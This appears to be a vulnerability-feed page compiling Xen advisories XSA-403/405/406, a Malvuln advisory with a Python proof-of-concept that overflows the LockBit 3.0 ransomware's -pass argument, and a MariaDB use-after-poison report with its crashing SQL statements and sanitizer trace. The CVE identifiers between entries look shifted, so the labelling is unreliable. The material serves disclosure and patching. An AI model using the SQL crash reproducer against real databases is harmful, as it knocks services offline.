Linux disk/nic frontends data leaks T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742).

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-26365,CVE-2022-33740,CVE-2022-33741,CVE-2022-33742 / XSA-403 version 3 Linux disk/nic frontends data leaks UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally the granularity of the grant table doesn't allow sharing less than a 4K page, leading to unrelated data residing in the same 4K page as data shared with a backend being accessible by such backend (CVE-2022-33741, CVE-2022-33742). IMPACT ====== An untrusted backend can access data not intended to be shared. If such mappings are made with write permissions the backend could also cause malfunctions and/or crashes to consumers of contiguous data in the shared pages. VULNERABLE SYSTEMS ================== All Linux guests using PV devices are vulnerable in case potentially malicious PV device backends are being used. MITIGATION ========== There is no mitigation available other than not using PV devices in case a backend is suspected to be potentially malicious. CREDITS ======= The issue related to not zeroing memory areas used for shared communications was discovered by Roger Pau Monné of Citrix. The issue related to leaking contiguous data in granted pages was disclosed publicly. RESOLUTION ========== Applying the attached patches to Linux makes the disk and network frontends capable of protecting themselves against potentially malicious backends. The signaling of whether a frontend should consider a backend as potentially malicious can be done from either the Linux kernel command line or the toolstack. Two different patches are provided for each Xen branch, but only the first patch will be applied to the official Xen repository for each branch. For the xen-unstable branch patch 1 introduces a new field to the disk and nic configurations that allow signaling on a per-device basis whether the backend should be trusted. This is an ABI incompatible change, and cannot be applied to stable branches. Patch 2 introduces support to libxl for libxl\_{disk,nic}\_backend\_untrusted environment variable to be used in order to set whether disk and network frontends should be trusted in the absence of a per-device setting. Patch 2 is provided as a courtesy for users of stable branches that might come to rely on this behavior. For the stable branches (Xen 4.16.x - Xen 4.13.x) patch 1 introduces support to libxl for libxl\_{disk,nic}\_backend\_untrusted environment variable to be used in order to set whether disk and network backends should be trusted. Patch 2 reverts patch 1 and instead provides the more fine grained per-device options that break the libxl ABI. Note that applying patch 2 to any of the stable releases will require a rebuild of any consumers of the libxl library, as it introduces an ABI breakage and hence won't be applied to the official repository stable branches. Users of stable releases wanting to use the functionality provided by patch 2 will need to apply it manually. Regardless of the combinations of patches applied, in the absence of any environment variable mentioned above backends will be trusted by default. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa403/xsa403-?.patch xen-unstable xsa403/xsa403-4.16-?.patch Xen 4.16.x - Xen 4.15.x xsa403/xsa403-4.14-?.patch Xen 4.14.x - Xen 4.13.x xsa403/xsa403-linux-\*.patch Linux 5.18 $ sha256sum xsa403\*/\* f28624407a3f040456ef2c52a18d8dcf486274ea082335ea38c9791646f4989c xsa403/xsa403-1.patch e06451655775009ceaf460bbba65374c05203eed295ff43fc5fa32a8d390a94a xsa403/xsa403-2.patch 5efb8af5ed5614f5e2e8d606a9debb3503cd9e114551525826fc5a7f9de91c02 xsa403/xsa403-4.14-1.patch 9ead8c6e4d694f3042c8d2fab4ea81619c4a9fc2aa7a0f485e9c873d927d283c xsa403/xsa403-4.14-2.patch ae778d5731ae663cca32d59ed9b1be51200b85c441771a9c6657c112e9550a15 xsa403/xsa403-4.16-1.patch 8ef7bd06f646fa72f22892d2b72ae44ff4e6c00d9817d52a71262be174862ee3 xsa403/xsa403-4.16-2.patch 8192d0c313448d7aa12c13d1632db3bd68835c19f60c237b87548d5c528852b0 xsa403/xsa403-linux-1.patch 4b288d3266f9396bedc7de823909aed4d1a89fe86b2edd1d625b0e32741688cf xsa403/xsa403-linux-2.patch dddf68625be516f0524fe7bb439272769cf7d612e15e00ac936bc047fd182f8a xsa403/xsa403-linux-3.patch 4e38a50a0e5ec6e90d2fffef003f8eb93a68518f4636c15cd59568ddf1861988 xsa403/xsa403-linux-4.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of patches or mitigations is NOT permitted (except where all the affected systems and VMs are administered and used only by organisations which are members of the Xen Project Security Issues Predisclosure List). Specifically, deployment on public cloud systems is NOT permitted. This is because the patches need to be applied in the affected guests. Switching from PV to non-PV devices is observable by the guests and has usually a bad performance impact. Deployment is permitted only AFTER the embargo ends. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmLEFf0MHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZSVkIALkao7hSqBVJhnVifpXpLn+mxfECoI6lgQ1sphz6 oJ7U2QxuI6j6gVSUPk3GglYjKurGBYZjBAX6fBU8po9Zdagz/iuOXCif41NHobP8 POscgXMjKR4HPE8liXNYzSbTAbn7qiyNCxBO5yGK/jPMIC8K9+0ed+9ese6VVXSj 4buiqlkLb9FP5xTCGbtt/raZoGVVRx+LLhwC8dlNXllEvI1cJIK18pfnPF+ZUQwL kXAx2figt3ZE1yNVv4Efnp2bMvv/XUGNU6X/ONP7wCKChzTOGdMyPMBJ1r73ceAn TSvVuWDBoiWCLVIY1leTjRx9xxbQq84htGG68i8nQrHckz8= =Wl2G -----END PGP SIGNATURE-----

CVE-2022-33742

network backend may cause Linux netfront to use freed SKBs While adding logic to support XDP (eXpress Data Path), a code label was moved in a way allowing for SKBs having references (pointers) retained for further processing to nevertheless be freed.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33743 / XSA-405 version 3 network backend may cause Linux netfront to use freed SKBs UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= While adding logic to support XDP (eXpress Data Path), a code label was moved in a way allowing for SKBs having references (pointers) retained for further processing to nevertheless be freed. IMPACT ====== A misbehaving or malicious backend may cause a Denial of Service (DoS) in the guest. Information leaks or privilege escalation cannot be ruled out. VULNERABLE SYSTEMS ================== Linux versions 5.9 - 5.18 are vulnerable. Linux versions 5.8 and earlier are not vulnerable. This vulnerability only increases the capability of an attacker in systems with less than fully privileged network backends (e.g. network driver domains). For systems where netback runs in dom0 (the default configuration), this vulnerability does not increase the capabilities of an attacker. MITIGATION ========== There is no mitigation available other than not using PV devices in case a backend is suspected to be potentially malicious. CREDITS ======= This issue was discovered by Jan Beulich of SUSE. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa405-linux.patch Linux 5.9 - 5.19-rc $ sha256sum xsa405\* 69716b78fbd996bce0414079bbb5f002029c5a82924aaae0db78a13c4b385f0a xsa405-linux.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of patches or mitigations is NOT permitted (except where all the affected systems and VMs are administered and used only by organisations which are members of the Xen Project Security Issues Predisclosure List). Specifically, deployment on public cloud systems is NOT permitted. This is because the patches need to be applied in the affected guests. Switching from PV to non-PV devices is observable by the guests and has usually a bad performance impact. Deployment is permitted only AFTER the embargo ends. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmLEFgAMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZgG4H/3KYUQdJlSEq2AEmIZhh1HDdhj/9n9Wxm0eHEqEQ pXvflqbqb2glZpQyWcFPcY4oRRYvy58p9FIEi3PJD+52K/7h58XcTEZKDFP87z53 iqATbN4s/wHQ45xWAuIEHsmfLRtj3gIr4qviux3dtygKMjo6cZDX7Ethv6j0xdgc lEUfvisH+3ZXG+JOQbZyxmi6g1SGDf1TJQczXR1rJjIp/npTupfFO+4r+vpiypbI 6ytFrRwmqfzuO8Mz5Wqrda8Fkk3JYoYtJdBfd/hYNu5vBN0d4o82sbZpuzVgdRI4 H+R90MB1XpZJ/mSYEDBbEctbmTFfJrRvr9yGjtCi8ivvQ5I= =fMa/ -----END PGP SIGNATURE-----

CVE-2022-33743

Arm guests can cause Dom0 DoS via PV devices When mapping pages of guests on Arm, dom0 is using an rbtree to keep track of the foreign mappings. Updating of that rbtree is not always done completely with the related lock held, resulting in a small race window, which can be used by unprivileged guests via PV devices to cause inconsistencies of the rbtree. These inconsistencies can lead to Denial of Service (DoS) of dom0, e.g. by causing crashes or the inability to perform further mappings of other guests' memory pages.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33744 / XSA-406 version 3 Arm guests can cause Dom0 DoS via PV devices UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= When mapping pages of guests on Arm, dom0 is using an rbtree to keep track of the foreign mappings. Updating of that rbtree is not always done completely with the related lock held, resulting in a small race window, which can be used by unprivileged guests via PV devices to cause inconsistencies of the rbtree. These inconsistencies can lead to Denial of Service (DoS) of dom0, e.g. by causing crashes or the inability to perform further mappings of other guests' memory pages. IMPACT ====== A guest performing multiple I/Os of PV devices in parallel can cause DoS of dom0 and thus of the complete host. VULNERABLE SYSTEMS ================== Only Arm systems (32-bit and 64-bit) are vulnerable. Dom0 Linux versions 3.13 - 5.18 are vulnerable. X86 systems are not vulnerable. MITIGATION ========== There is no mitigation available. CREDITS ======= This issue was discovered by Oleksandr Tyshchenko of EPAM. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa406-linux.patch Linux 3.13 - 5.19-rc $ sha256sum xsa406\* 7a789f564b3365cade6e95d549dbbd5a8b7b5e53d09bc5a463c77dfefd5a4182 xsa406-linux.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmLEFgEMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZwJUIAJSrSYNMQE4jo1sJFKjEJ3cHy6CymbJC94JSm2Tf HzeMlwd7NQF3Sc2HSWQoCSI+0TiRb6bJpfZASsbL/E3b6zcm3+VxwS7HVUtvHXhN HJYRUMN9vckUkGwWDYbgveI7uie9P7gpjwi5CEXxQf4NO9Oloyk2J5bijktzbBN2 9FIZ7zFuiSRwGtr2WRaozCSzgg4EGiPRc5eMCFMP+K0P+oRvpkE52wWo/ZOPzW8T xocUIcvQK335ib04OCS3oqJZrRNwrvX6Vn+CifXac2WHR9tQ24VnTq1iYRrVD+5x kxpg4IuiNc2eD8lZCLnKEUDUj6LzWvgxKoxXgJFKXlESb0A= =57so -----END PGP SIGNATURE-----

CVE-2022-33744

Lockbit ransomware version 3.0 apparently now requires a password to execute as noted by "@vxunderground", but does not properly check bounds for both the -pass and -k arguments. Supplying a long string of characters for either flag will trigger a unicode stack buffer overflow overwriting the ECX register and structured exception handler (SEH).

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Ransom Lockbit 3.0  
Vulnerability: Local Unicode Buffer Overflow (SEH)  
Description: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a", but doesnt properly check bounds for both the -pass and -k arguments. Supplying a long string of characters for either flag will trigger a unicode stack buffer overflow overwriting the ECX register and structured exception handler (SEH).   
Family: Lockbit  
Type: PE32  
MD5: 38745539b71cf201bb502437f891d799  
Vuln ID: MVID-2022-0620  
ASLR: False  
DEP: True  
CFG: False  
Safe SEH: False  
Disclosure: 07/03/2022

Memory Dump:  
(b4.1c38): Access violation - code c0000005 (first/second chance not available)  
eax=6bce1634 ebx=00000000 ecx=00410041 edx=77729d70 esi=00000000 edi=00000000  
eip=a291273d esp=000a12f8 ebp=000a1318 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  
a291273d ??              ???

0:000> .ecxr  
eax=6bce1634 ebx=00000000 ecx=00410041 edx=77729d70 esi=00000000 edi=00000000  
eip=a291273d esp=000a12f8 ebp=000a1318 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  
a291273d ??              ???

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+1b21e  
0041b21e f366a5          rep movs word ptr es:[edi],word ptr [esi]

EXCEPTION_RECORD:  0019f688 -- (.exr 0x19f688)  
ExceptionAddress: 0041b21e (LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+0x0001b21e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  a291273d

WRITE_ADDRESS:  a291273d 

FOLLOWUP_IP:   
+1b21e  
a291273d ??              ???

FAILED_INSTRUCTION_ADDRESS:   
+1b21e  
a291273d ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  a291273d  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

CONTEXT:  0019f6d8 -- (.cxr 0x19f6d8)  
eax=00000020 ebx=0019fc00 ecx=0000004a edx=0000029a esi=025724f4 edi=001a0000  
eip=0041b21e esp=0019fb38 ebp=0019fb48 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+0x1b21e:  
0041b21e f366a5          rep movs word ptr es:[edi],word ptr [esi]  
Resetting default scope

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 0041b26a to 0041b21e

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_00410041

STACK_TEXT:    
00000000 00000000 lockbit3+0x0

STACK_COMMAND:  .cxr 000000000019F6D8 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  lockbit3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: lockbit3

IMAGE_NAME:  lockbit3

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000005_lockbit3!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_00410041_BAD_IP_lockbit3

Followup: MachineOwner  
---------

0:000> !exchain  
0019f59c: ntdll!ExecuteHandler2+44 (77729d70)  
0019ffcc: LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+10041 (00410041)  
Invalid exception stack at 00410041

Exploit/PoC:  
from subprocess import Popen

#Discovery/Credits: malvuln  
#Vulnerability: Unicode Buffer Overflow (SEH)  
#Disclosure: 07/03/2022  
#Hash: 80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce  
#MD5: 38745539b71cf201bb502437f891d799  
#================================================================================================  
#  
#Apparently Lockbit 3.0 - Lockbit Black (aka LockShit), now requires a password to execute E.g.  
#  
#vx-underground commented on 2022-07-03 18:55:48 UTC  
#  
#{04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a  
#  
#https://bazaar.abuse.ch/sample/80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce/  
#===============================================================================================  
#  
#Supplying a long payload of characters for the -pass or -k switches triggers a Buffer Overflow.  
#===============================================================================================

TARGET="LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce.exe"  
BANNER="""  
    __               __   _____ __    _ __   
   / /   ____  _____/ /__/ ___// /_  (_) /_  
  / /   / __ \/ ___/ //_/\__ \/ __ \/ / __/  
 / /___/ /_/ / /__/ ,<  ___/ / / / / / /_    
/_____/\____/\___/_/|_|/____/_/ /_/_/\__/  3.0

                                                                   Unicode Buffer Overflow  
                        By malvuln  
"""

PAYLOAD="A"*666

def doit():  
    Popen([TARGET, "-pass", PAYLOAD], shell=True)

if __name__=="__main__":  
    print(BANNER)  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom Lockbit 3.0 MVID-2022-0620 Buffer Overflow

MariaDB v10.4 to v10.7 was discovered to contain an use-after-poison in prepare_inplace_add_virtual at /storage/innobase/handler/handler0alter.cc.

CREATE TABLE v0 ( v1 TIME NOT NULL PRIMARY KEY ) ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( lpad ( 'x' , NULL = 32 , 'x' ) ) STORED ;

 SHOW LOCAL STATUS WHERE COALESCE ( 27 , 51 - 39 ) = 'x' ;

 DELETE FROM v0 WHERE 44707452.000000 ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( v1 + v1 ) , DROP COLUMN v0 ;

 SELECT COUNT ( \* ) FROM v0 WHERE v1 = -128 AND v1 = 'x' ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:49:19 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:49:19 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:49:19 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:49:19 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:49:19 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:49:26 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:49:26 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:49:26 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:49:26 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:49:26 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:49:26 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/19/ib\_buffer\_pool

2021-08-16 14:49:26 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:49:28 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:49:28

2021-08-16 14:49:28 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/19.socket'  port: 10019  Source distribution

\=================================================================

\==2119277==ERROR: AddressSanitizer: use-after-poison on address 0x6190000d6d60 at pc 0x55a3184baacf bp 0x7f47ed829920 sp 0x7f47ed829910

WRITE of size 64 at 0x6190000d6d60 thread T14

    #0 0x55a3184baace in prepare\_inplace\_add\_virtual /experiment/mariadb-server/sql/field.h:1395

    #1 0x55a3184cc1db in prepare\_inplace\_alter\_table\_dict /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:6206

    #2 0x55a3184d9f06 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:8270

    #3 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #4 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #5 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #6 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #7 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #8 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #9 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #10 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #11 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #12 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f4811fee5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6190000d6d60 is located 480 bytes inside of 1152-byte region \[0x6190000d6b80,0x6190000d7000)

allocated by thread T14 here:

    #0 0x7f4812ad5279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55a3185c76c0 in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /experiment/mariadb-server/storage/innobase/include/ut0new.h:375

    #2 0x55a3185c76c0 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /experiment/mariadb-server/storage/innobase/mem/mem0mem.cc:277

    #3 0x55a3184da801 in mem\_heap\_create\_func /experiment/mariadb-server/storage/innobase/include/mem0mem.ic:377

    #4 0x55a3184da801 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:7816

    #5 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #6 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #7 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #8 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #9 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7f4812a76fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55a31827bea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55a31827bea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55a3170ecb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

